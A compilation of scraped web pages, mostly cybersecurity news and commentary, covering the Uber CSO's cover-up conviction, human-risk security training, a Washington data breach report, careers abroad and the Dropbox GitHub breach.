Jan 12th, 2023
by Nikhil Deb and Nadia Genshaft-Volz
Jan 9th, 2023
by Mary B. McCord and Jacob Glick
Jan 6th, 2023
by Dean Jackson, Meghan Conroy and Alex Newhouse
Jan 5th, 2023
by Ambassador Peter Mulrean (ret.) and William J. Hawk
Jan 4th, 2023
by Jon Lewis
Jan 3rd, 2023
by Eugene R. Fidell
Jan 3rd, 2023
by Tess Bridgeman and Ryan Goodman
Dec 26th, 2022
by Ryan Goodman and Justin Hendrix
Dec 23rd, 2022
by Joshua Rudolph, Norman L. Eisen and Thomas Kleine-Brockhoff
Dec 22nd, 2022
by Maria Popova and Oxana Shevel
Dec 21st, 2022
by Maria Popova and Oxana Shevel
Dec 21st, 2022
by Ryan Goodman
Dec 19th, 2022
by John Ramming Chappell
Dec 19th, 2022
by Pierre Espérance
Dec 15th, 2022
by Željko Komšić
Dec 12th, 2022
by Paras Shah
Dec 9th, 2022
by Chile Eboe-Osuji
Dec 8th, 2022
by Kate Shaw
Dec 8th, 2022
by Chile Eboe-Osuji
Dec 8th, 2022
by Beatrice Eriksson
Dec 6th, 2022
by Richard Dicker and Paloma van Groll
Dec 5th, 2022
by Lisa Benjamin
Dec 2nd, 2022
by Ryan Goodman
Dec 1st, 2022
by Ambassador (ret) John E. Herbst and Jennifer Cafarella
Nov 30th, 2022
by Karen Gullo and Christoph Schmon
Nov 23rd, 2022
by Imad Daïmi
Nov 22nd, 2022
by Susan Benesch
Nov 21st, 2022
by Clara Apt and Katherine Fang
Nov 18th, 2022
by Andrew Weissmann, Ryan Goodman, Joyce Vance, Norman L. Eisen, Fred Wertheimer, E. Danya Perry, Siven Watt, Joshua Stanton, Donald Simon and Alexander K. Parachini
Nov 17th, 2022
by Chiara Giorgetti, Markiyan Kliuchkovsky, Patrick Pearsall and Jeremy K. Sharpe
Nov 16th, 2022
by Chiara Giorgetti, Markiyan Kliuchkovsky, Patrick Pearsall and Jeremy K. Sharpe
Nov 16th, 2022
by Marieke de Hoon
Nov 15th, 2022
by Jon Hoffman and Abdullah Alaoudh
Nov 15th, 2022
by Camila Bustos and Jeffrey Chase
Nov 14th, 2022
by Heather Aliano
Nov 11th, 2022
by Asha Rangappa
Nov 10th, 2022
by Ambassador Daniel Fried
Nov 9th, 2022
by Ambassador Daniel Fried
Nov 9th, 2022
by Mark Nevitt
Nov 8th, 2022
by Jacek Pruski and Helen White
Nov 7th, 2022
by Ashley Gorski
Nov 4th, 2022
by Katherine Yon Ebright
Nov 3rd, 2022
by Kirk Herbertson
Nov 2nd, 2022
by Elizabeth Goitein
Oct 31st, 2022
by Letta Tayler
Oct 27th, 2022
by Brianna Rosen
Oct 25th, 2022
by Ambassador Juan Manuel Gómez-Robledo Verduzco
Oct 24th, 2022
by Cathryn Grothe
Oct 21st, 2022
by Steven J. Barela
Oct 20th, 2022
by Douglas London
Oct 18th, 2022
by Luke Hartig
Oct 17th, 2022
by Jonathan Leader Maynard
Oct 14th, 2022
by Oona A. Hathaway
Oct 11th, 2022
by Amanda L. White Eagle
Oct 10th, 2022
by Muhammad Kamal
Oct 7th, 2022
by Richard Dicker and Paloma van Groll
Oct 6th, 2022
by Naomi Kikoler and Sarah McIntosh
Oct 6th, 2022
by Jens Iverson
Oct 5th, 2022
by Jens Iverson
Oct 5th, 2022
by John K. Glenn
Oct 4th, 2022
by Jennifer Trahan
Sep 26th, 2022
by Jennifer Trahan
Sep 26th, 2022
by Norman L. Eisen and Fred Wertheimer
Sep 26th, 2022
by Just Security
Sep 24th, 2022
by Astrid Reisinger Coracini
Sep 23rd, 2022
by Astrid Reisinger Coracini
Sep 23rd, 2022
by Ambassador H.E. Juan Ramón de la Fuente and Pablo Arrocha Olabuenaga
Sep 23rd, 2022
by Karl Mihm, Jacob Apkon and Sruthi Venkatachalam
Jan 30th, 2023
by Clara Apt and Katherine Fang
Nov 18th, 2022
by Clara Apt
Feb 14th, 2023
by Noah Bookbinder, Norman L. Eisen, Debra Perlin, E. Danya Perry, Jason Powell, Donald Simon, Joshua Stanton and Fred Wertheimer
Oct 27th, 2022
by Tess Bridgeman and Brianna Rosen
Mar 24th, 2022
by Megan Corrarino
Feb 18th, 2022
by Mary B. McCord
Jan 24th, 2022
by Emily Berman, Tess Bridgeman, Megan Corrarino, Ryan Goodman and Dakota S. Rudesill
Jan 20th, 2022
by Laura Brawley, Antara Joardar and Madhu Narasimhan
Oct 29th, 2021
by Leila Nadya Sadat
Sep 13th, 2021
by Tess Bridgeman, Rachel Goldbrenner and Ryan Goodman
Sep 7th, 2021
by Just Security
Jul 19th, 2021
by Kate Brannen
Jun 30th, 2021
by Fionnuala Ní Aoláin and Kate Brannen
Jun 14th, 2021
by Steven J. Barela and Mark Fallon
Jun 1st, 2021
by Christine Berger
May 29th, 2021
by Beth Van Schaack
Feb 1st, 2021
by Beth Van Schaack and Chris Moxley
Nov 16th, 2020
by Oona A. Hathaway, Preston Lim, Mark Stevens and Alasdair Phillips-Robins
Nov 10th, 2020
by Emily Berman, Tess Bridgeman, Ryan Goodman and Dakota S. Rudesill
Oct 14th, 2020
by Cristina Rodríguez and Adam Cox
Oct 12th, 2020
by Scott Roehm, Rita Siemion and Hina Shamsi
Sep 11th, 2020
by Matiangai Sirleaf
Jul 13th, 2020
by Catherine O'Rourke
Oct 21st, 2020
by Sarah Knuckey and Jayne Huckerby
May 27th, 2020
by Tess Bridgeman and Ryan Goodman
Sep 12th, 2019
by Just Security
Jan 28th, 2019
by Marty Lederman
Oct 25th, 2018
by Erik Dahl
Jun 7th, 2022
by Justin Hendrix, Nicholas Tonckens and Sruthi Venkatachalam
Aug 29th, 2021
by Ryan Goodman and Juilee Shivalkar
Aug 8th, 2021
by Kate Brannen and Ryan Goodman
May 11th, 2021
by Atlantic Council's DFRLab
Feb 10th, 2021
by Ryan Goodman, Mari Dugas and Nicholas Tonckens
Jan 11th, 2021
by Ryan Goodman and Danielle Schulkin
Nov 3rd, 2020
by Chris Shenton
Aug 24th, 2020
by Ryan Goodman and Danielle Schulkin
Jul 27th, 2020
by Ryan Goodman and Julia Brooks
Mar 11th, 2020
Christian Ohanian (@CGOhanian) is Senior Counsel for Privacy and Cybersecurity for Cyber & Intelligence Solutions at Mastercard and a Senior Fellow in the Tech, Law & Security program at American University. He previously served as an Assistant General Counsel with the National Security Agency (NSA).
Send A Letter To The Editor
by Oleksandra Matviichuk, Natalia Arno and Jasmine D. Cameron
Mar 3rd, 2023
by Katherine Fang and Clara Apt
Mar 2nd, 2023
by Beth Alexion, Nicholas Miller and Jordan Street
Feb 28th, 2023
by Mark Malloch-Brown
Feb 24th, 2023
by Paras Shah
Feb 24th, 2023
by Lauren Van Metre
Feb 24th, 2023
by Luis Moreno Ocampo
Feb 23rd, 2023
by Mark Nevitt
Feb 21st, 2023
by Hans Corell
Feb 14th, 2023
by Hans Corell
Feb 14th, 2023
by Elizabeth Goitein
Feb 13th, 2023
by Norman L. Eisen, E. Danya Perry and Fred Wertheimer
Feb 7th, 2023
Just Security is based at the Reiss Center on Law and Security at New York University School of Law.

source

A federal jury has found Joe Sullivan, former CSO of Uber, guilty of covering up a data breach the company suffered in 2016. 
The breach saw 57 million user’s information including full names, email addresses, telephone numbers and driver’s license numbers exposed, and led to Uber paying US$148,000 to settle civil litigation.
Sullivan was convicted on October 5 of obstruction of proceedings of the Federal Trade Commission (FTC) and misprision of felony in connection with attempting to cover up the hack.
In November 2014, Uber suffered a data breach that exposed the personal information of 50,000 customers. As this hack was disclosed to the FTC, Uber’s data security practices were investigated. In May 2015, Uber was served a Civil Investigative Demand by the FTC. The demand required Uber to give extensive information on its data security practices as well as detailed information on any other occasions where unauthorized parties had gained access to confidential user information.
The Department of Justice (DOJ) said in a statement that it was demonstrated that Sullivan played a significant part in Uber’s response to the FTC, including “supervis[ing] Uber’s responses to the FTC’s questions, participat[ing] in a presentation to the FTC in March 2016, and testify[ing] under oath…to the FTC on November 4, 2016, regarding Uber’s data security practices…includ[ing] specific representations about steps he claimed Uber had taken to keep customer data secure”.
Ten days after his testimony, Sullivan learned that the data breach had taken place, as he was contacted directly by the hackers on November 14, 2016.
Evidence at the trial demonstrated that Sullivan actively tried to keep knowledge of the breach reaching the FTC, including telling a subordinates that information about the hack was to be “tightly controlled” and that they “can[not] let this get out”. He also told employees outside of the security team that the official line to the rest of the business was “this investigation does not exist”.
Sullivan attempted to pay the two hackers $100,000 to sign a non-disclosure agreement which, according to the DOJ, “contained the false representation that the hackers did not take or store any data”. Uber paid the hackers $100,000 in Bitcoin in December 2016, despite not knowing their true identities. In January 2017, Uber discovered their identities and the hackers signed a new version of the original non-disclosure agreement which contained their true names. Both hackers were prosecuted and pleaded guilty in October 2019 to charges of computer fraud conspiracy. They are currently awaiting sentencing.
Despite this information being crucial to the FTC investigation, evidence showed that Sullivan did not disclose any information about the cyber security incident to Uber’s lawyers who were handling the investigation, nor to the General Counsel of Uber. The initial investigation was settled in summer of 2016, without Sullivan mentioning the breach.
In 2017, Uber began investigating the 2016 breach. During the investigation, Sullivan lied to the new CEO of Uber, Dara Khosrowshahi, telling him that the hackers were only paid after their identities were revealed. He also deleted information from a draft of a report on the breach that it involved the exposure of a large amount of personal information of a large number of Uber customers. The breach was eventually discovered and disclosed to both the FTC and the general public in November 2017. 
At the trial, the jury found Sullivan guilty of obstruction of justice and misprision of felony. He faces a maximum of five years in prison for obstruction and a maximum of three years for misprision. He remains free on bond and will be sentenced at a later date, yet to be set. 
08 – 09 March 2023
Free CS Hub Online Event
08 March, 2023
Online
15 March, 2023
Online
15 March, 2023
Online
March 21, 2023
Free CS Hub Online Event
22 March, 2023

Insights from the world’s foremost thought leaders delivered to your inbox.
2023-04-20
10:00 AM – 11:00 AM EST
2023-04-12
10:00 AM – 11:00 AM EST
2023-04-05
10:00 AM – 11:00 AM SGT
Reach Cyber Security professionals through cost-effective marketing opportunities to deliver your message, position yourself as a thought leader, and introduce new products, techniques and strategies to the market.
Join CSHUB today and interact with a vibrant network of professionals, keeping up to date with the industry by accessing our wealth of articles, videos, live conferences and more.
Cyber Security Hub, a division of IQPC

Careers With IQPC| Contact Us | About Us | Cookie Policy
Become a Member today!
Already an IQPC Community Member?
Sign in Here or Forgot Password
Sign up now and get FREE access to our extensive library of reports, infographics, whitepapers, webinars and online events from the world’s foremost thought leaders.
We respect your privacy, by clicking ‘Subscribe’ you will receive our e-newsletter, including information on Podcasts, Webinars, event discounts, online learning opportunities and agree to our User Agreement. You have the right to object. For further information on how we process and monitor your personal data click here. You can unsubscribe at any time.

source

IT Pro Today is part of the Informa Tech Division of Informa PLC
This site is operated by a business or businesses owned by Informa PLC and all copyright resides with them. Informa PLC’s registered office is 5 Howick Place, London SW1P 1WG. Registered in England and Wales. Number 8860726.
Karen D. Schwartz | Sep 07, 2022
Chances are you have spent some of your work hours clicking through your company’s cybersecurity awareness training modules. As you progressed through the training, you may have hoped to get just enough answers right so you could return to your real work. You may even have resented how much time it took from your day and wondered if it made a difference.
Despite the continued use of cybersecurity awareness training programs, it has become clear that the typical approaches simply don’t work as well as they should. Employees often fail to retain the information they are taught. The reason for this may be what 19^th-century German psychologist Herman Ebbinhouse called the “Forgetting Curve.” According to Ebbinhouse’s studies, without reinforcement or connection to previous knowledge, most people will forget an average of 56% of what they learned within an hour, 66% after a day, 75% after six days, and 90% within the first month.
Related: Ransomware Security for IT Pros: 2022 Report
Cybersecurity awareness training can also fail because it focuses on the wrong things and uses a one-size-fits-all approach. In addition, the training often has a punitive nature when instead it should seek to create a real culture of security.
“We make people who have better things to do sit through an hour or more of cybersecurity talk that they don’t care about, and they don’t retain the information,” said Jinan Budge, a vice president and principal analyst who leads Forrester’s security and risk research in Asia Pacific. “As a result, they end up hating security.”
The shortcomings of security awareness training have pushed the industry to pioneer a new category of cybersecurity protection, one that focuses on understanding the human risk within an organization. It aims to analyze the cybersecurity behavior of individual employees, divisions, and geographies, then promptly provide users who deviate from security policies with short, constructive “learning moments.” The goal of the approach is to change cybersecurity behaviors and culture permanently.
Because this is a relatively nascent area, vendors and analysts are calling it different things. KnowBe4 calls it human detection and response (HDR), while Living Security calls it human risk management (HRM). Forrester, meanwhile, calls it human risk quantification (HRQ).
The underlying idea behind the new approach is to provide a gentle yet persistent way of reinforcing good cyber hygiene, said James McQuiggan, a security awareness advocate at KnowBe4.
“Rather than hitting employees with so much training, this is a way to provide small, friendly reminders whenever something happens that triggers [an intervention],” McQuiggan said.
“Rather than hitting employees with so much training, this is a way to provide small, friendly reminders whenever something happens that triggers [an intervention].”
— James McQuiggan, KnowBe4
KnowBe4’s HDR offering, Security Coach, is based on its recent acquisition of SecurityAdvisor. Security Coach pushes micro-learning modules to users based on parameters set by the customer organization. The offering integrates with KnowBe4’s existing security awareness training platform.
Living Security, another enterprising vendor in this space, provides Unify Insights. Its HRM offering quantifies human risk, engages users, and then measures changes in user behavior. Its human risk index provides risk scores for the organization, user segments, and individuals, and pinpoints specific weaknesses that get immediately addressed through short and targeted training sessions.
There are plenty of examples for how training sessions would be triggered, including these scenarios:
So far, only a handful of vendors are at work in this space. In addition to KnowBe4 and Living Security, vendors offering similar products include Elevate Security and CybSafe. While products work somewhat differently, they share many attributes.
Products tend to use a data-based approach that centers on quantifying and measuring security behaviors, for example. In most cases, products integrate with most of or all the security tools an organization uses, from antivirus and firewalls to extended detection and response and endpoint detection.
In addition, user behavior data can be communicated back to the organization’s security operations center, highlighting areas that need work. If a user or group performs an action outside of acceptable cybersecurity behaviors, they will receives a short “coaching moment” – e.g., a 5-minute pop-up video via email, Slack, Teams, or another communication platform.
“Let’s say you plugged in a flash drive that had malware on it and [the malware] was detected,” McQuiggan said. “The person might get an email saying, ‘We wanted to let you know that you inadvertently introduced malware into our environment through a flash drive. Here are some of the dangers that can occur if you don’t know where the flash drive came from or what’s on it.’ ”
This data-based approach can also provide valuable information to security teams. For example, if some learning prompts are triggered more than others, they may point to a persistent issue that the security team must prioritize.
“CSOs and security program owners really just want to see what’s going on so they can assess their human risk index,” Living Security CEO Ashley Rose explained. “With that information, they can better understand what groups or people are the most at risk and most vigilant, and they can prioritize their program focus and determine what actions to take.”
Finally, these offerings take a markedly different approach to measuring training success. With traditional security awareness training, NIST research found that most organizations have measured success by simply the number of trainings completed or if phishing simulation click rates decreased. Other organizations have relied on employee feedback, attendance at security awareness events, and online views of security awareness materials.
These new products measure success with more sophisticated frameworks, such a human risk index.
Moving toward the new training approach requires buy-in from leadership and the creation of comprehensive security policies. Additionally, it’s critical to focus on positive reinforcement instead of the more negative reinforcement used frequently in traditional cybersecurity training.
“If employees have to train, it might as well be fun and engaging,” Rose said. To that end, Living Security provides access to content such as cybersecurity escape rooms and live-action modules.
Organizations must also create a feedback loop. “Companies hear from employees all the time that they were asked to complete training and it was never mentioned again. They want to know how they performed,” Rose noted. “The company needs to address it with the employee. It reinforces everything and empowers them to take an action, like downloading a password manager or being more cautious with opening email attachments.”
During the next three years, Budge expects this market to explode. She said the market might evolve into “adaptive people protection” – a process that reduces training in favor of automated processes, tools, and policies that protect employees.
“Your role as a human is to be human,” Budge said. “Security should do its job.”
About the author
More information about text formats
Follow us:

source

Cybercrime is the biggest fraud threat facing most businesses today. Image: Unsplash/Jefferson Santos
Listen to the article

What is the World Economic Forum doing on cybersecurity?
Create a free account and access your personalized content collection with our latest publications and analyses.
License and Republishing
World Economic Forum articles may be republished in accordance with the Creative Commons Attribution-NonCommercial-NoDerivatives 4.0 International Public License, and in accordance with our Terms of Use.
The views expressed in this article are those of the author alone and not the World Economic Forum.
A weekly update of the most important issues driving the global agenda

You can unsubscribe at any time using the link in our emails. For more details, review our

privacy policy.
Cyber scams are exploiting Türkiye-Syria earthquake relief efforts. Here’s what to know
Spencer Feingold
February 24, 2023
What everyone misses when it comes to cyber attacks
Thomas Johansmeyer
January 25, 2023
Here’s how business leaders can prepare for systemic cybersecurity events
Paolo Dal Cin, Michael Rohrs and Sean Doyle
January 18, 2023
Cybersecurity: What the global tech experts have to say about it
Why we need global rules to crack down on cybercrime
Robert Muggah and Mac Margolis
January 2, 2023
New cyber threat landscape spurs shift to zero trust security paradigm
Adrian McDonald
December 12, 2022
About Us
Events
Media
More from the Forum
Partners & Members
Language Editions
Privacy Policy & Terms of Service
© 2023 World Economic Forum

source

Bob Ferguson
Special edition of the report focuses on protecting Washingtonians’ sensitive data in wake of record cybercrime
OLYMPIA — Attorney General Bob Ferguson released his seventh annual data breach report today. The report shows that data breaches remain at record-breaking severity. This year, 4.5 million data breach notices were sent to Washingtonians, second only to the 2021 record of 6.3 million since the Attorney General’s Office began tracking this number.
This year’s report is a special data-privacy edition, focusing on protecting consumer data even before breaches occur. Corporations collect and sell massive amounts of sensitive personal data. The more that this data is shared and collected, the more vulnerable consumers are to data breaches and cybercrime. In this year’s special-edition report, Ferguson is proposing a slate of reforms to protect Washingtonians’ data privacy — particularly sensitive data on consumers’ reproductive health care.
“Washingtonians deserve control over whether entities get to profit off their most sensitive data,” Ferguson said. “This is particularly urgent after the U.S. Supreme Court overturned Roe v Wade. The Legislature must adopt these reforms to help protect Washingtonians.”
The Attorney General’s Office receives no funding to publish this report. The Legislature does not direct the office to publish the report. The Attorney General provides the report as a public service to provide Washingtonians with critical information to help them safeguard their data.
The report includes recommendations to policymakers and best practices for the public to protect their data and minimize risks.
The public can access the Attorney General’s database of breaches here.
Another record-high year
Data breach activity remains at historic levels after last year’s torrent of breaches.
State law requires organizations that experience a data breach to send notices to all consumers whose data was exposed, and report breaches impacting more than 500 Washingtonians to the Attorney General’s Office. Breached businesses and agencies sent 4.5 million of these notices to Washingtonians in 2022. This year’s number of data breach notices is the second highest after last year’s record of 6.3 million notices.
The Attorney General’s Office received 150 data breach notifications this year, also the second highest amount after the 2021 record. This is more than double the average number of breaches from the first five years the report was issued, 2016 to 2020.
The number of larger breaches — breaches affecting more than 50,000 Washingtonians — remained in the double digits for the second year in a row.
This is the second consecutive year Washington was hit with a “mega breach” — a breach affecting more than one million Washingtonians. This year, a cybersecurity attack on T-Mobile exposed the data of more than 2 million Washingtonians. This is the largest breach to hit the state since the Equifax breach of 2018, which affected 3.2 million Washingtonians.
Cyberattacks and ransomware remain at prolific levels. Breaches caused by malicious cybercriminals caused 68 percent of all reported data breaches. Ransomware — a type of cyberattack in which cybercriminals use malicious code to hold data hostage in hopes of receiving a ransom payment from the data holders — was involved in 43 data breaches this year.
The data used in the report is acquired through a high-level review of breach notices submitted to the office. A list of all data breach notices that have been sent to the office since 2015 is publicly available at https://www.atg.wa.gov/data-breach-notifications. Information for businesses on reporting data breaches is available at www.atg.wa.gov/identity-theft-and-privacy-guide-businesses.
A roadmap for strengthening data privacy in Washington
The report makes several policy recommendations for Washington lawmakers to strengthen privacy and data breach protections.
-30-
Washington’s Attorney General serves the people and the state of Washington. As the state’s largest law firm, the Attorney General’s Office provides legal representation to every state agency, board, and commission in Washington. Additionally, the Office serves the people directly by enforcing consumer protection, civil rights, and environmental protection laws. The Office also prosecutes elder abuse, Medicaid fraud, and handles sexually violent predator cases in 38 of Washington’s 39 counties. Visit www.atg.wa.gov to learn more.
Media Contact:
Brionna Aho, Communications Director, (360) 753-2727; Brionna.aho@atg.wa.gov
General contacts: Click here
Advanced Search
1125 Washington St SE • PO Box 40100 • Olympia, WA 98504 • (360) 753-6200
OFFICE HOURS: 8:00 AM – 5:00 PM Monday – Friday  Closed Weekends & State Holidays

source

The world is becoming a smaller place. The prospect of working in another country becomes increasingly realistic and even promising as businesses migrate toward the cloud and collaborate more closely with international partners. Amid this shift, cybersecurity professionals may wonder if they can work abroad.
Cybersecurity is a worldwide concern, creating plenty of global opportunities for security professionals. They may not even have to be in the same country as their employers to provide their services. This opens up many questions for those who are considering a move to another region. Here is a closer look at some of these questions.
In any industry, working in another country will carry some unique understandings. Outside of varying workplace cultures, cybersecurity professionals should expect to encounter different demands and regulations.
Cybersecurity workers in the U.K. should understand the National Cyber Security Centre (NCSC) and its role in their work. Similarly, professionals in the EU must consider GDPR more heavily in all their decisions. Some of these regulatory differences will be more stringent than what employees see in the U.S., while others won’t. However, they require adaptation.
Just as there are cost-of-living adjustments within a particular country, there will likely be pay-scale differences between various nations, too. For example, a person working in the U.K. will be compensated differently than someone working in Singapore. Similarly, what companies expect from their cybersecurity partners varies slightly, but best security practices are universal, so professionals won’t need to relearn what is and isn’t safe. However, standard business practices and preconceptions will differ as well, so different challenges may be encountered there.
For example, the standard Israeli work week is 43 hours instead of 40 and runs from Sunday to Thursday instead of Monday to Friday. Sometimes, these differences are a legal matter, as in France, where the law holds that most workers aren’t responsible for responding to messages after hours.
Adapting to these differences may be challenging, but working abroad has many advantages. Most notably, security experts may be able to make more in other countries. Professionals in some nations earn six figures on average, and others may offer more flexibility and benefits than U.S.-based companies.
The potential for job growth and a wider choice of employment opportunities are other factors driving people abroad. The U.S. employs more cybersecurity professionals than anywhere else, but demand remains high globally. The U.K., Brazil, South Korea, and Japan have booming security industries that could give job-seekers unique opportunities.
Other workers may seek security jobs abroad simply because they want to see the world. Some countries may also have lower crime rates or easier tax regulations than the U.S.
Working abroad will bring unique challenges as well. People who move somewhere with another primary language may encounter communication barriers.
Required skills and backgrounds may also differ among countries. Skills that constitute a qualified cybersecurity expert in the U.S. may not carry the same recognition in Japan, so some workers may face limited options when moving internationally.
Traveling security workers who choose to work remotely will encounter some cybersecurity challenges of their own. They must remember to follow the best hybrid environment security practices to keep their data private.
Every country offers unique benefits and disadvantages for cybersecurity professionals working abroad. What constitutes the best place to work may differ depending on people’s preferences and needs, but generally speaking, some areas are better for cybersecurity than others.
India has rapidly growing IT and banking industries, creating plenty of opportunities for cybersecurity professionals. Switzerland also has a high demand for security workers thanks to its banking industry, and its low tax rate is also attractive. The EU has many opportunities, as legislation like the European Cybersecurity Act and GDPR raises the demand for security professionals. If you’re a person working abroad, it’s really important to understand the tax implications prior to making a commitment.
Some workers may migrate to areas with higher average salaries. Luxembourg has the highest average pay for cybersecurity professionals at more than $110,000 annually, but it also has a high cost of living. Japan, Belgium and the U.K. also offer globally leading salaries for security workers.
Some cybersecurity professionals may seek to work remotely. Remote work lets employees live where they want and opens the door to new opportunities, so it’s an excellent strategy for working abroad.
Experts predict that 25% of all jobs will be remote before long, but this trend is uneven across different industries. Naturally, fewer manufacturing jobs are remote than programming positions. Cybersecurity professionals looking into working abroad may wonder where this industry falls along that spectrum.
Many cybersecurity positions still require workers to be in-office at least some of the time, but several remote jobs are also available. Companies are becoming less stringent about noncritical requirements due to a global cybersecurity workforce gap of 2.7 million workers. More are accepting remote and hybrid security positions to fill this rising demand.
Cybersecurity is a global problem, so there is a demand for these workers worldwide. Professionals seeking a different experience, new setting or potentially higher pay can capitalize on this movement by working abroad.
Security experts who want to work for an international company, whether in that company’s domiciled country, or remotely, should expect differences in salary, culture, and even work hours. If they can adapt to these unique considerations, they can excel in this globally important profession.

Image

About the Author: Dylan Berger has several years of experience writing about cybercrime, cybersecurity, and similar topics. He’s passionate about fraud prevention and cybersecurity’s relationship with the supply chain. He’s a prolific blogger and regularly contributes to other tech, cybersecurity, and supply chain blogs across the web.
Editor’s Note: The opinions expressed in this guest author article are solely those of the contributor and do not necessarily reflect those of Tripwire, Inc.

source

Image by Freepik
Dropbox has disclosed a security breach after threat actors stole 130 code repositories from one of its GitHub accounts using employee credentials stolen in a phishing attack.

The company said that no content, passwords, or payment information was accessed, and the issue was quickly resolved. The company discovered the attackers breached the account on October 14 when GitHub notified it of suspicious activity that started one day before the alert was sent.

Upon discovery of the incident, security teams took “immediate action” to coordinate the rotation of all exposed developer credentials and determine what customer data, if any, had been accessed or stolen. 

“To date, our investigation has found that the code accessed by this threat actor contained some credentials—primarily, API keys—used by Dropbox developers,” Dropbox revealed on Tuesday.

The code and the data around it also included a few thousand names and email addresses belonging to Dropbox employees, current and past customers, sales leads, and vendors, Dropbox says, noting the company has more than 700 million registered users. 

The company also revealed that its core apps and infrastructure were unaffected, as access to this type of code is more limited and strictly controlled. 

“Because we take our commitment to security, privacy, and transparency seriously, we have notified those affected and are sharing more here,” Dropbox said. The company hired outside forensic experts to verify its findings and reported the incident to appropriate law enforcement and regulators.

Nick Rago, Field CTO at Salt Security, says the Dropbox security breach “serves as a good reminder for organizations to scan their source code repositories to look for any credentials stored in plain text (API keys, passwords, etc.) that a threat actor could potentially use if they were to gain access to the repository.”

Dr. Eric Cole, Advisory Board Member at Theon Technology, says there are several red flags raised in reading the details of the disclosure. “Why was Dropbox/GitHub targeted, and what was the attacker after? Attackers do not break into an organization with no goal or objective. Dropbox is making this sound like it was just a casual attack and no real damage happened, but very rarely is that true. Either the attacker did indeed compromise sensitive data, and it was not discovered yet, or information was taken that can be used for extortion or ransom payments. In summary, stay tuned; what was initially reported and what will be reported over the next several weeks is going to most likely change dramatically.”

You must have JavaScript enabled to enjoy a limited number of articles over the next 30 days.
Sponsored Content is a special paid section where industry companies provide high quality, objective, non-commercial content around topics of interest to the Security audience. All Sponsored Content is supplied by the advertising company. Interested in participating in our Sponsored Content section? Contact your local rep.
ON DEMAND: Business-impacting events such as severe weather, man-made disasters, and supply chain disruption are increasing in frequency and making impacts around the globe. 
The John F. Kennedy Center for the Performing Arts is home to some of the nation’s largest events, from the Kennedy Center Honors to the Mark Twain Prize and high-caliber theatrical and symphonic performances.
 Effective Security Management, 5e, teaches practicing security professionals how to build their careers by mastering the fundamentals of good management. Charles Sennewald brings a time-tested blend of common sense, wisdom, and humor to this bestselling introduction to workplace dynamics. 
Copyright ©2023. All Rights Reserved BNP Media.
Design, CMS, Hosting & Web Development :: ePublishing

source